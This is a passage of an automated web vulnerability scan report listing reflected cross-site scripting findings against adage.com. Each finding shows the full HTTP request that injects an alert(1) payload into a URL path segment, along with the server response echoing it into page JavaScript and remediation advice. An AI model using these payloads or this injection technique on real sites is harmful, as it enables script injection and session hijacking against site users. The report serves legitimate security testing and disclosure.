Set-Cookie: HMAC=3D43F266A0BC072AF7615592EB2858AF6C096891; path=/
Set-Cookie: HMAC=89A7E34C2F77D436B34718418F9E40C17FE5787F; path=/
Set-Cookie: HMAC=5091F94BA091246E26A3BE3005968DA62A85D5BC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49489
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail4fff7"-alert(1)-"3fade222f3c/digitalalist-022811-rr.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.c
...[SNIP]...

1.80. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18340"-alert(1)-"32365ab770 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail/digitalalist-022811-rr.jpg18340"-alert(1)-"32365ab770?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=4BBE23C8D8130CD77C92E054C7602E7616503128; path=/
Set-Cookie: HMAC=C67C9BA3D45D64D16E54014DC60EE8021C4611C6; path=/
Set-Cookie: HMAC=9E12DA5071045DF698137F38FD902479F7E3F9E2; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49488
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
/CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg18340"-alert(1)-"32365ab770"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.81. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6af"-alert(1)-"fce269f3ba2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images8e6af"-alert(1)-"fce269f3ba2/bin/image/rightrail/digitalconf2011-rr-040611.jpg?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=35D8B0A760E64FFE49E131C883B827DAF4A59C4B; path=/
Set-Cookie: HMAC=A621210025B7A1CEED2AF2B685DB93D1C4D44132; path=/
Set-Cookie: HMAC=79498CEC1DABB4DB8B02710C7DFDABD0EAB0774D; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images8e6af"-alert(1)-"fce269f3ba2/bin/image/rightrail/digitalconf2011-rr-040611.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.
...[SNIP]...

1.82. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91819"-alert(1)-"1f8001d74a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin91819"-alert(1)-"1f8001d74a5/image/rightrail/digitalconf2011-rr-040611.jpg?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=5196DF328032DA374CBCA6ABD1E699CF85D4DE1E; path=/
Set-Cookie: HMAC=DE694482C060A2ACC6E5BAFA4625482406562F7C; path=/
Set-Cookie: HMAC=07EDCC0A6456B52DB5DE3F206CA832D6E1B7A521; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin91819"-alert(1)-"1f8001d74a5/image/rightrail/digitalconf2011-rr-040611.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="
...[SNIP]...

1.83. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f67"-alert(1)-"555f3d15fb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image33f67"-alert(1)-"555f3d15fb7/rightrail/digitalconf2011-rr-040611.jpg?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=42F68FB4585FDBAA7200F42759AA80B0C20AB3B6; path=/
Set-Cookie: HMAC=FE7745E41786DC9F34C85BAA11D4FAEE2D926EC1; path=/
Set-Cookie: HMAC=7915378F8A3686EBFD965FD381A117C9500F4D7B; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image33f67"-alert(1)-"555f3d15fb7/rightrail/digitalconf2011-rr-040611.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
...[SNIP]...

1.84. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c6d7"-alert(1)-"f252829a817 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail9c6d7"-alert(1)-"f252829a817/digitalconf2011-rr-040611.jpg?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=363EE0A4E10D6A8E52E9E8EC26CB41F6681643C2; path=/
Set-Cookie: HMAC=F915197A6916877B5C859835834687AC1CDFD478; path=/
Set-Cookie: HMAC=335BDDB342933866F6A259B74438BEB69CB0314A; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail9c6d7"-alert(1)-"f252829a817/digitalconf2011-rr-040611.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.85. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd32d"-alert(1)-"b0f2a928db4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail/digitalconf2011-rr-040611.jpgdd32d"-alert(1)-"b0f2a928db4?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=98BABB1D468228D3F0A0E5E54102412561015CC6; path=/
Set-Cookie: HMAC=D2C0874BC840C4BC23ABDF495CA8E2D39B0B248B; path=/
Set-Cookie: HMAC=C0AB1BBC72E3FDDFDCAB319B0EF6580229B41D6E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
NFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpgdd32d"-alert(1)-"b0f2a928db4"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.86. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/agency_news.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed158"-alert(1)-"e8877cf2e51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesed158"-alert(1)-"e8877cf2e51/bottom/menus/agency_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=98AC1FFC09CE811728175DEE34A9694FC11F8284; path=/
Set-Cookie: HMAC=86DD4263D7B9D38FD42C2AB6566E1566EFDE1174; path=/
Set-Cookie: HMAC=98EC0002721ABC56FA42F1533BA752FD46B7DCE3; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagesed158"-alert(1)-"e8877cf2e51/bottom/menus/agency_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!
...[SNIP]...

1.87. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/agency_news.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad82f"-alert(1)-"f3588c172fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottomad82f"-alert(1)-"f3588c172fb/menus/agency_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:34 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=113070EA1C5D31940DF983F0F3B51B780DF35489; path=/
Set-Cookie: HMAC=F8DB2743043A563B00DF80427CAE12490B770DFC; path=/
Set-Cookie: HMAC=EB560CC6B571D3BF5B1B849D6AE9D158F71FEA28; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottomad82f"-alert(1)-"f3588c172fb/menus/agency_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.j
...[SNIP]...

1.88. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/agency_news.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54949"-alert(1)-"b7bdff866a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus54949"-alert(1)-"b7bdff866a3/agency_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=53308B94AE01E45B31A9C1FE1BEB8FC3CF9BBF23; path=/
Set-Cookie: HMAC=98DD410FC021DD3B8059045FE15B20BD5EDA7C55; path=/
Set-Cookie: HMAC=66F2D4FB75340305D444C399723FE88A47F14DCD; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus54949"-alert(1)-"b7bdff866a3/agency_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hb
...[SNIP]...

1.89. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/agency_news.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8074b"-alert(1)-"f96571d605a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/agency_news.png8074b"-alert(1)-"f96571d605a?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=59BE7FE4471BB2B760B7ACFF47B119B7783608D3; path=/
Set-Cookie: HMAC=2230ADCFA68F69A782A678417E315B5BED8BC612; path=/
Set-Cookie: HMAC=A86AF01F12B991A4F4CD00A19A849902A6F29B08; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
in.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/agency_news.png8074b"-alert(1)-"f96571d605a"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.90. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/cmo_strategy.png

Issue detail

